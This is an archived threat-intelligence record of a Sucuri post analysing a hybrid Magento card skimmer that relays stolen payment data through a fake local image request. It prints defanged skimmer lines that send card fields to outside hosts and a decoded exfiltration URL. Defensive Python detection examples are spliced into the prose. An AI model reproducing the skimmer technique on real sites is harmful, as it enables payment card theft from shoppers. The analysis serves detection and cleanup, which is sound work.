{
	"id": "18cc755c-b252-4105-8229-402213a02d75",
	"created_at": "2026-04-06T00:09:29.075712Z",
	"updated_at": "2026-04-10T13:12:16.486793Z",
	"deleted_at": null,
	"sha1_hash": "977267b4fd3c42512157d7a92dc45c11c6fd186a",
	"title": "Evasion Tactics in Hybrid Credit Card Skimmers",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 224209,
	"plain_text": "Evasion Tactics in Hybrid Credit Card Skimmers\r\nBy Denis Sinegubko\r\nPublished: 2020-06-05 · Archived: 2026-04-05 22:24:55 UTC\r\nThe most common type of Magento credit card stealing malware is client-side JavaScript that grabs data entered\r\nin a checkout form and sends it to a third-party server controlled by the attackers.\r\nThough popular with bad actors, one drawback of this approach is that the requests to\r\nsuspicious servers can be spotted by anyone who monitors the traffic generated by checkout pages — or any other infected pages.\r\nA lesser-known, but still very popular, type of skimmer instead harvests the information server-side.\r\nFor example, hackers modify one of the core Magento PHP files or payment module files that first receive\r\nthe payment data from the checkout form. By adding a few lines of code to such a file, an attacker can\r\ncopy the customer information to a downloadable static file, email it, or send it to a third-party server.\r\nIn the case of server-side skimmers, the infection is completely invisible from the outside. There is, however, one\r\nminor issue with this approach: it’s easy to spot modifications in core or known module files.\r\nHybrid Approach\r\nIn a hybrid approach, some hacker groups employ snippets of JavaScript that send stolen data to their own\r\nserver-side scripts on the same compromised site. This serves as an evasive maneuver which helps them\r\navoid visible requests to third-party servers: requests sent to the site’s own domain are usually less scrutinized.\r\nThe server-side PHP script which receives the stolen information then forwards it to a third-party server, which is\r\nnot detectable from the outside. The script is created as a new file with a legitimate-looking name, so that it can’t\r\nbe easily compared with the original codebase. 
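A baseline manifest takes the 'legitimate-looking name' advantage away: whatever the file is called, it either hashes to a value recorded from the clean codebase or it is new. The following is an added example for this page, not code from the Sucuri post or a Magento tool; build_manifest, diff_manifest and the throwaway webroot that demo() creates are this example's own constructions, and the file contents are placeholders rather than real Magento code.

```python
import hashlib
import tempfile
from pathlib import Path

# Helper names (sha256_of, build_manifest, diff_manifest, demo) are this
# example's own; they are not tools from the Sucuri post or from Magento.

def sha256_of(path):
    # Stream the file so large media or log files do not get read into memory at once.
    h = hashlib.sha256()
    with open(path, 'rb') as fh:
        for chunk in iter(lambda: fh.read(65536), b''):
            h.update(chunk)
    return h.hexdigest()

def build_manifest(root):
    # Map every regular file under root (POSIX-style relative path) to its SHA-256.
    root = Path(root)
    manifest = {}
    for path in root.rglob('*'):
        if path.is_file():
            manifest[path.relative_to(root).as_posix()] = sha256_of(path)
    return manifest

def diff_manifest(baseline, current):
    # The name of a file tells you nothing. It is suspicious because it is absent
    # from the baseline (added) or no longer hashes to the recorded value (modified).
    added = sorted(p for p in current if p not in baseline)
    removed = sorted(p for p in baseline if p not in current)
    modified = sorted(p for p in current if p in baseline and current[p] != baseline[p])
    return {'added': added, 'modified': modified, 'removed': removed}

def demo():
    # Constructed webroot standing in for a Magento 1.x install.
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / 'app').mkdir()
        (root / 'index.php').write_text('<?php // original entry point')
        (root / 'app' / 'Mage.php').write_text('<?php // original core file')
        baseline = build_manifest(root)
        # Simulate the hybrid skimmer: a plausibly named new file is dropped in
        # (the server-side relay), and one existing core file gets a line injected.
        (root / 'get.php').write_text('<?php // copy of an old index.php with a relay added')
        (root / 'app' / 'Mage.php').write_text('<?php // original core file // injected')
        return diff_manifest(baseline, build_manifest(root))

if __name__ == '__main__':
    print(demo())
```

The baseline should be built from a known-clean checkout (a fresh download of the same Magento release plus the site's own reviewed customisations) and stored off the web server, since a manifest kept in the webroot can be edited by the same attacker who dropped the file.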
With a bit of effort, attackers can modify their malicious code to\r\nlook quite natural, so that it may be taken as just some benign customization.\r\nThese features allow the hybrid approach to circumvent some, but not all, of the shortcomings found in both client-side and\r\nserver-side skimmers. For example, the client-side part is detectable from the\r\noutside by web page scanners, and the server-side file will most likely be reported by integrity control tools as a\r\nnew addition. Moreover, hybrid skimmers are more complex as they involve two separate parts written in two\r\ndifferent languages (usually JavaScript and PHP) and may require access to both the file system and the database.\r\nThat being said, we do come across hybrid skimmers from time to time. Let’s discuss a real-world example of\r\nmalware employing this approach.\r\nClient-Side of the Hybrid Skimmer\r\nSimilar to what our team regularly finds client-side on compromised ecommerce websites, the first part of the\r\nmalware is a typical JavaScript skimmer with two layers of obfuscation:\r\nhttps://blog.sucuri.net/2020/06/evasion-tactics-in-hybrid-credit-card-skimmers.html\r\nPage 1 of 4\n\nOriginal JavaScript skimmer\r\nOnce deobfuscated, we find that it collects all the usual checkout form data such as credit card number, expiration\r\ndate, first and last names, etc. However, unlike a typical Magecart script, this skimmer sends the stolen data to a\r\nURL on the same site instead of a specialized exfiltration URL on a third-party site.\r\nSending payment data to get.php\r\nMore specifically, the script creates a new image tag with the src attribute pointing to the /get.php file on the\r\nsame compromised site. The stolen data is passed along as GET parameters to that image.\r\nServer-Side Part of the Hybrid Skimmer\r\nOf course, that /get.php file has no intention of returning a real image. 
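Two checks a responder can run for exactly this pattern, written as an added example for this page rather than code from the Sucuri post or from Magento. The first scans access-log lines of the compromised site for GET requests to a local .php script whose query string carries a Luhn-valid card number: the image-tag trick puts the PAN straight into the site's own logs. The second scans PHP source for fixed hex literals passed to hex2bin() and decodes them, which is how the get.php file described below hides its third-party exfiltration address. The helper names, the simplified log format (no quotes around the request, unlike Apache's combined format) and the sample PHP lines are this example's own constructions; the hex literal is the one quoted in the post.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Helper names below (luhn_ok, card_numbers_in, suspicious_php_requests,
# decoded_hex2bin_literals) are this example's own, not code from the post.

def luhn_ok(digits):
    # Luhn checksum: separates a real card number from an order id or phone number.
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:
            d = d * 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0

def card_numbers_in(value):
    # Any run of 13 to 19 digits that passes Luhn, after stripping spaces and dashes.
    compact = value.replace(' ', '').replace('-', '')
    return [run for run in re.findall('[0-9]{13,19}', compact) if luhn_ok(run)]

def suspicious_php_requests(log_lines):
    # Flag requests to a local .php script whose query string carries a Luhn-valid
    # card number. Returns (script path, parameter name, masked PAN) tuples so the
    # findings can be shared without spreading card data.
    hits = []
    for line in log_lines:
        tokens = line.split()
        path = next((t for t in tokens if t.startswith('/')), None)
        if path is None:
            continue
        parts = urlsplit(path)
        if not parts.path.endswith('.php'):
            continue
        params = parse_qs(parts.query, keep_blank_values=True)
        for name, values in params.items():
            for value in values:
                for pan in card_numbers_in(value):
                    masked = pan[:6] + '*' * (len(pan) - 10) + pan[-4:]
                    hits.append((parts.path, name, masked))
    return hits

# Matches hex2bin( followed by an optional space, one quote character and a
# fixed hex literal of at least 16 hex digits (8 bytes); the quote is matched by '.'.
HEX2BIN_LITERAL = re.compile('hex2bin[(] *.([0-9a-fA-F]{16,})')

def decoded_hex2bin_literals(php_source):
    # Decode every fixed hex literal handed to hex2bin(). A decoded value that
    # contains :// is the hidden exfiltration address. Returns (text, looks_like_url).
    found = []
    for hexstr in HEX2BIN_LITERAL.findall(php_source):
        try:
            text = bytes.fromhex(hexstr).decode('ascii')
        except ValueError:
            continue
        found.append((text, '://' in text))
    return found

# Constructed sample log lines in a simplified format: client, timestamp, method, path, status, size.
SAMPLE_LOG = '''
203.0.113.7 - - [05/Jun/2020:10:01:12 +0000] GET /get.php?p=4111111111111111&h=JOHN+DOE+12%2F24+123 200 43
203.0.113.7 - - [05/Jun/2020:10:01:13 +0000] GET /checkout/onepage/success/?order=100000123 200 8812
203.0.113.9 - - [05/Jun/2020:10:02:40 +0000] GET /skin/frontend/base/default/images/logo.png 200 5120
'''

# Constructed stand-in for the two malicious lines in the trojanised index.php copy.
# Only the hex literal is taken from the post; the surrounding lines are this example's own.
SAMPLE_PHP = '''<?php
$u = hex2bin('687474703a2f2f3138352e3131302e3133322e3232302f6c342e7068703f703d');
if (isset($_GET['p'])) { /* relay of p and h to $u, omitted */ }
'''

if __name__ == '__main__':
    print(suspicious_php_requests(SAMPLE_LOG.strip().splitlines()))
    print(decoded_hex2bin_literals(SAMPLE_PHP))
```

Against real data, feed the site's access_log lines to suspicious_php_requests() and the contents of every recently added or modified .php file to decoded_hex2bin_literals(); a Luhn-valid PAN in a GET request to the site itself, or a decoded literal that is a URL, each justify a manual look at the file in question.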
All it wants to do is obtain the payment\r\ndetails from the GET request whenever a browser tries to load the fake image.\r\nIn essence, the get.php file pretends to be a legitimate file. It’s basically an old version of the index.php file from\r\nMagento 1.x with just a couple of lines of malicious code added: lines 25 and 35.\r\nMalware at the top of an old index.php file\r\nLine 35 checks if there is a set “p” parameter in the request, then sends the value of this and the “h” parameters to\r\na third-party exfiltration URL. The address of that exfiltration server is obfuscated on line 25 as a hex string that hex2bin() turns back into plaintext; it is encoded, not encrypted.\r\nAfter the hex2bin decoding, “687474703a2f2f3138352e3131302e3133322e3232302f6c342e7068703f703d” turns\r\ninto “hxxp://185.110.132[.]220/l4.php?p=”.\r\nPrevious Variations of Skimmers Used by the Same Bad Actors\r\nOur team also traced more “classical” client-side skimmers back to this same server.\r\nFor example, in the jshost[.]org skimmer (2019), the decoded JavaScript malware looks very similar. It uses the\r\nsame “img” trick, the main difference being that it uses an external exfiltration address rather than a local one.\r\n...\r\ni=document.createElement('img');\r\ni.src='hxxps://msm.jshost[.]org/l3.php?p=222'+encodeURIComponent('\u0026fln='+fln+'\u0026ct='+ct+'\u0026cn='+cn+'\u0026ce\r\n...\r\nAn even older (2016) scriptb[.]com version of this skimmer also used the same img trick.\r\nvar i = document.createElement('img');\r\ni.src = 'hxxps://scriptb[.]com/l2.php?p=197' + encodeURIComponent('\u0026fln=' + fln + '\u0026ct=' + ct + '\u0026cn=\r\nBoth the jshost[.]org and scriptb[.]com domains pointed to the same 185.110.132[.]220 server in Russia.\r\nSince 2016, this very server has employed the exact same exfiltration filenames, including l.php, l2.php, l3.php and\r\nl4.php.\r\nIf you try to open the files in a browser, you’ll find a regular 404 page. 
However, when you request any other URL\r\nthat really shouldn’t be on the server, you’ll get a slightly different 404 page, proving that the 404 response for\r\nthese malicious l.php pages is fake.\r\nConclusion\r\nWeb skimmer authors are constantly testing new ways to circumvent detection and conceal their malware\r\nwithin compromised systems. To accomplish this and effectively harvest stolen data, one technique has been\r\ntrending in credit card stealing malware: a hybrid approach, which sends stolen data to the attackers’ own server-side\r\nscripts on the same compromised site.\r\nFor webmasters, this means it’s really important that you are thorough during the cleanup process when reviewing\r\nand removing malware reported by external scanners. There may be server-side parts of the credit card skimmer\r\nstill lurking on the site. File system integrity controls can be helpful for locating recently added or modified files.\r\nSource: https://blog.sucuri.net/2020/06/evasion-tactics-in-hybrid-credit-card-skimmers.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://blog.sucuri.net/2020/06/evasion-tactics-in-hybrid-credit-card-skimmers.html"
	],
	"report_names": [
		"evasion-tactics-in-hybrid-credit-card-skimmers.html"
	],
	"threat_actors": [
		{
			"id": "5a0483f5-09b3-4673-bb5a-56d41eaf91ed",
			"created_at": "2023-01-06T13:46:38.814104Z",
			"updated_at": "2026-04-10T02:00:03.110104Z",
			"deleted_at": null,
			"main_name": "MageCart",
			"aliases": [],
			"source_name": "MISPGALAXY:MageCart",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "3fad11c6-4336-4b28-a606-f510eca5452e",
			"created_at": "2022-10-25T16:07:24.346573Z",
			"updated_at": "2026-04-10T02:00:04.948823Z",
			"deleted_at": null,
			"main_name": "Turbine Panda",
			"aliases": [
				"APT 26",
				"Black Vine",
				"Bronze Express",
				"Group 13",
				"JerseyMikes",
				"KungFu Kittens",
				"PinkPanther",
				"Shell Crew",
				"Taffeta Typhoon",
				"Turbine Panda",
				"WebMasters"
			],
			"source_name": "ETDA:Turbine Panda",
			"tools": [
				"Agent.dhwf",
				"Agentemis",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"Derusbi",
				"Destroy RAT",
				"DestroyRAT",
				"FF-RAT",
				"FormerFirstRAT",
				"Hurix",
				"Kaba",
				"Korplug",
				"LOLBAS",
				"LOLBins",
				"Living off the Land",
				"Mivast",
				"PlugX",
				"RbDoor",
				"RedDelta",
				"RibDoor",
				"Sakula",
				"Sakula RAT",
				"Sakurel",
				"Sogu",
				"StreamEx",
				"TIGERPLUG",
				"TVT",
				"Thoper",
				"Winnti",
				"Xamtrav",
				"cobeacon",
				"ffrat"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434169,
	"ts_updated_at": 1775826736,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/977267b4fd3c42512157d7a92dc45c11c6fd186a.pdf",
		"text": "https://archive.orkl.eu/977267b4fd3c42512157d7a92dc45c11c6fd186a.txt",
		"img": "https://archive.orkl.eu/977267b4fd3c42512157d7a92dc45c11c6fd186a.jpg"
	}
}